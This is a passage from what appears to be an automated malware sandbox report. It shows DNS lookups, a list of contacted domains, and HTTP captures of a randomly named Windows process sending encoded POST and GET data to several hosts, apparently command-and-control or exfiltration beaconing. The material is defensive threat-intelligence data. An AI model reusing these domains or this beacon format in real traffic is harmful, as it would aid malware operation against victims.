                                                      Sep 11, 2024 11:20:37.361391068 CEST1.1.1.1192.168.2.40x9c67No error (0)030002304.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:51.583141088 CEST1.1.1.1192.168.2.40xc5e9No error (0)www.kfowks.site38.181.141.122A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.2bhp.com
                                                      • www.ultraleap.net
                                                      • www.dalong.site
                                                      • www.mgeducacaopro.online
                                                      • www.heldhold.xyz
                                                      • www.63582.photo
                                                      • www.useanecdotenow.tech
                                                      • www.asiapartnars.online
                                                      • www.linkwave.cloud
                                                      • www.mfgarage.net
                                                      • www.b5x7vk.agency
                                                      • www.rtpngk.xyz
                                                      • www.doggieradio.net
                                                      • www.40wxd.top
                                                      • www.030002304.xyz
                                                      • www.kfowks.site

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.44973681.88.63.46803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:24.474478006 CEST495OUTGET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.2bhp.com
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:17:25.129198074 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:17:25 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.463317217.70.184.50803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:40.222723007 CEST766OUTPOST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d
                                                      Data Ascii: pP_8=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
                                                      Sep 11, 2024 11:17:40.860830069 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:40 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.463318217.70.184.50803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:43.430991888 CEST786OUTPOST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 50 61 49 43 58 38 55 77 4e 64 65 41 4a 68 4b 56 4d 38 52 65 66 58 64 50 76 42 4c 45 79 78 74 45 67 3d
                                                      Data Ascii: pP_8=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbPaICX8UwNdeAJhKVM8RefXdPvBLEyxtEg=
                                                      Sep 11, 2024 11:17:44.027640104 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:43 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.463319217.70.184.50803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:45.975841045 CEST10868OUTPOST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 33 31 49 68 77 54 46 4c 41 79 34 44 4e 50 44 67 73 4c 54 49 4d 6f 50 70 79 55 58 67 57 42 72 2b 72 6b 49 4d 59 70 70 2f 36 45 78 62 6a 47 30 70 42 4f 61 49 78 42 76 2b 71 56 59 53 2b 4e 5a 32 58 51 61 59 6b 72 62 69 34 35 43 6b 76 6b 49 63 47 2b 46 6e 6e 36 68 55 76 58 4c 6e 75 38 57 69 68 79 37 51 6b 50 30 47 5a 2b 61 76 44 4a 6d 30 6e 61 7a 67 69 36 76 4f 72 4c 65 53 4e 38 5a 59 37 42 51 56 38 51 35 4f 45 2b 58 71 66 70 56 54 50 76 55 79 46 6e 58 33 52 32 44 45 45 44 4f 65 58 50 47 49 48 46 4d 6d 32 79 75 78 73 33 79 49 30 62 67 78 54 31 76 59 77 46 50 6c 63 4e 6b 43 55 61 77 63 32 33 53 32 73 38 46 79 41 50 50 64 48 67 6a 31 39 62 54 38 61 6b 38 73 72 51 31 6a 54 59 71 49 70 5a 37 5a 4f 42 66 30 55 49 38 66 74 56 56 43 48 68 41 46 70 65 70 39 6b 51 48 32 31 4b 4b 4e 42 48 77 61 59 6d 4c 2b 38 54 38 78 47 41 4d 72 71 65 74 36 68 4e 78 78 55 5a 65 31 39 6d 52 [TRUNCATED]
                                                      Data Ascii: pP_8=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H31IhwTFLAy4DNPDgsLTIMoPpyUXgWBr+rkIMYpp/6ExbjG0pBOaIxBv+qVYS+NZ2XQaYkrbi45CkvkIcG+Fnn6hUvXLnu8Wihy7QkP0GZ+avDJm0nazgi6vOrLeSN8ZY7BQV8Q5OE+XqfpVTPvUyFnX3R2DEEDOeXPGIHFMm2yuxs3yI0bgxT1vYwFPlcNkCUawc23S2s8FyAPPdHgj19bT8ak8srQ1jTYqIpZ7ZOBf0UI8ftVVCHhAFpep9kQH21KKNBHwaYmL+8T8xGAMrqet6hNxxUZe19mRm7pSynUpV8FmM0qrq/tZxxkR6uir0qeuGuWWrkF8yD+lcVdj5vQC3bpeFwI5HDpVRR7zBNBLdVzZ4Ba6WsIWxHMP+c/KtTmQ+1vGox7cMDTUa8WzgUK57s2TVGbbN2nuu2Q62W5F/9znSs7Czhf1SwN69+NyyDhKZieZmSYQ9lZZpm/WPzOC9eNXduu8NXLa+oQoWy+xzK2UsuwDbxakg+QTgjaNQFqh/0ceHxS8eZ6gyu7ZzxfEejWLg71vrFR2gQ34MfOLZMKFs4a71jjsi8P3ofzAH5TyTVrfyCQP8kzQtt7wKPeGvekxMenUoGXbc4r6jL0bRxHBsPVhZuG8+5szYI8YvOWH/s6W+HrHRhYDK6+sTxQlDyGNkYQOjUfqc8vIBvcMMCmy49cJkL4/YOieVc8OpjmM6KBAV/AB4cRo0NKIdMV0I7AtuuvRsr9j33xjuxi/FviyzAL7jSafDjzxNY1ZD0QHPdDquzRc0L/eIIXEclqCcyA5TaExNIXBoCyBaozPUNzZxVSs8Ja8vfjywDfHT4h4Cocjwit8jSreS1J3Yk5Wlp4CLS4fkZnzI7ppxoMK4UkLZayz5v29BifUuptnxNIIS39b8c1v0lu3a2Gc1mOf91mVKCDF6XlKiNDBq9k/kIBzje1T2f+xq9gq/d4CwKryrE [TRUNCATED]
                                                      Sep 11, 2024 11:17:46.566657066 CEST713INHTTP/1.1 502 Bad Gateway
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:46 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 568
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.463320217.70.184.50803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:48.519026041 CEST500OUTGET /8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.ultraleap.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:17:49.105931997 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:49 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Language
                                                      Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                                      Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                                      Sep 11, 2024 11:17:49.105952024 CEST890INData Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                                      Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.463321172.96.187.60803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:54.669792891 CEST760OUTPOST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 71 4f 75 47 63 6e 53 55 2b 42 62 64 32 68 31 4f 58 4f 4d 55 65 49 43 33 52 69 38 6c 38 75 53 52 34 41 45 39 45 44 5a 54 63 77 4e 42 53 50 70 61 6c 7a 54 59 70 6c 41 7a 4c 4d 38 2f 32 7a 4e 75 67 45 66 78 58 68 41 55 34 4e 79 4e 49 70 35 58 77 6a 4e 6e 6c 59 7a 59 37 2f 58 6b 50 42 76 79 2f 69 63 4d 6b 54 6c 71 64 57 77 76 4c 6a 6f 41 71 56 34 59 51 4c 44 48 57 6b 4e 4c 2b 6b 52 52 51 4d 4b 35 77 73 34 6b 61 4b 6b 48 75 54 41 49 39 79 6c 6e 54 51 5a 2f 6a 52 66 6a 52 6d 53 72 55 39 41 56 73 6b 43 36 45 63 30 39 73 55 6c 69 7a 46 36 45 32 41 3d 3d
                                                      Data Ascii: pP_8=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTQZ/jRfjRmSrU9AVskC6Ec09sUlizF6E2A==
                                                      Sep 11, 2024 11:17:55.140651941 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:17:55 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.463322172.96.187.60803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
